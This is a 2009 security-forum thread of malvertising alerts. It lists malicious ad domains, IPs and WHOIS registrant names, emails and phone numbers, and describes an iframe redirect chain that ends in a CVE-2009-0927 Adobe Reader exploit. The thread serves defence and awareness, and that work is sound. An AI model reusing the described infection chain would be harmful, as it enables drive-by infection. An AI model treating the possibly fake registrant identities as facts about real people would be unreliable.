Said Fahtihma (saidfahtih@gmail.com)
A. Kodiri, 65
Tashkent
Kishlak, 100060
UZ
Tel: 998.348.754.198

Hostnames sharing IP with a-records:

212-95-37-133.internetserviceteam.com
adclickmate.net
ns1.adclickmate.net
ns2.adclickmate.net

0-= Continued @ Spyware Sucks
Image

User avatar
TeMerc
Site Admin
Site Admin
Posts: 15995
Joined: Fri Jan 28, 2005 5:16 pm
Area Of Expertise: Security
experience: I know the functions, OS settings, registry tweaks and more
PC time: What else is there in life?
Location: PHX, AZ
Contact:

Re: Rogue Banner Ads [Gilmours Media [May 21]

Postby TeMerc » Tue Aug 11, 2009 12:45 am

Malvertizement featuring TravelRes
The malvertizement attempted to load a clickrevenue.info URL:

Code: Select all

clickrevenue.info
ICANN Registrar: REGTIME LTD
Created 21 July 2009
NS1.NAMESELF.COM (89.108.122.149 - Agava) (195.161.113.218 - RTCOMM, Russia)
NS2.NAMESELF.COM (89.108.122.120.153 - Agava) (217.16.27.38 - MASTERHOST, Russia)

IP:  89.149.243.28 - Berlin, Netdirekt E.k

Registrant:
Paul McShane (paulmcshane@pisem.net)
St Mainlow 212
San Jose CA 96014
Tel: +1 212 265 4785 77

pisem.net (Registrant email address)
ICANN Registrar: NETWORK SOLUTIONS, LLC.
Created 19 November 1999
NS1.POCHTA.RU
NS2.POCHTA.RU
NS3.POCUTA.RU

IP: 82.204.219.251 - Moscow City, Pochta.ru Network
0-= Continued @ Spyware Sucks Blog
Image

User avatar
TeMerc
Site Admin
Site Admin
Posts: 15995
Joined: Fri Jan 28, 2005 5:16 pm
Area Of Expertise: Security
experience: I know the functions, OS settings, registry tweaks and more
PC time: What else is there in life?
Location: PHX, AZ
Contact:

Re: Rogue Banner Ads [Gilmours Media [May 21]

Postby TeMerc » Fri Sep 04, 2009 10:13 am

ALERT: Please treat the domains gogomediacenter.com, sys17media.com and praharesorts.cn with extreme caution
It is very interesting to watch the modus operandi that the bad guys are using change.

This malvertizement was NOT seen on a web page; rather it was being displayed by an advertising supported freeware application.

The trouble starts when an ad.yieldmanager.com GET retrieves content, in an iframe, from the domain "gogomediacenter.com". The content served up by gogomediacenter.com is an innocent "skechers” JPG (which is the advertisement itself), but it also serves up a little something extra...
0-=Continued @ Spyware Sucks
Image

User avatar
TeMerc
Site Admin
Site Admin
Posts: 15995
Joined: Fri Jan 28, 2005 5:16 pm
Area Of Expertise: Security
experience: I know the functions, OS settings, registry tweaks and more
PC time: What else is there in life?
Location: PHX, AZ
Contact:

Re: Rogue Banner Ads [Gilmours Media [May 21]

Postby TeMerc » Wed Sep 09, 2009 11:46 pm

Another two bad domains: newadsresults.com and waveadvert.com
Seen distributing malvertizing at starnewsonline.com:
http://forums.starnewsonline.com/eve/fo ... 9841029019

And collegehumor.com:
http://www.facebook.co.za/CollegeHumor

And tigerdroppings.com:
http://www.tigerdroppings.com/rant/mess ... 80012&pg=1

And basilmarket.com (page doesn't load, but you can find it in Google cache):
http://www.basilmarket.com/forum/1184277/2
0-= Continued @ Spyware Sucks Blog
Image

User avatar
TeMerc
Site Admin
Site Admin
Posts: 15995
Joined: Fri Jan 28, 2005 5:16 pm
Area Of Expertise: Security
experience: I know the functions, OS settings, registry tweaks and more
PC time: What else is there in life?
Location: PHX, AZ
Contact:

Re: Rogue Banner Ads [Gilmours Media [May 21]

Postby TeMerc » Sun Sep 13, 2009 12:40 am

ALERT: Please treat content from trendbanner.com with extreme caution
It has been implicated in the facilitation of malvertizing that attempts to infect computers via PDF exploit

The way it works is as follows:

ad.trendbanner.com uses document.write to load the JS content at banner.pushbanner769.info

banner.pushbanner769.info displays an advertisement, but also loads content from content from t.banner08092.com.

t.banner08092.com simply redirects to blackwater-cuprumworks.net

blackwater-cuprumworks.net includes a javascript (valla.js) which loads content from bintus-bahi.cn in a 0x0 iframe

bintus-bahi.cn uses CVE-2009-0927 (Stack-based buffer overflow in Adobe Reader and Acrobat via the getIcon method of a Collab object) to infect vulnerable computers, as well as downloading other malware.

The SWF (oneComesEthics.swf) is suspected to be malicious.
0-= Continued @ Spyware Sucks Blog
Image


Return to “Latest Malware Threats”

Who is online

Users browsing this forum: No registered users and 1 guest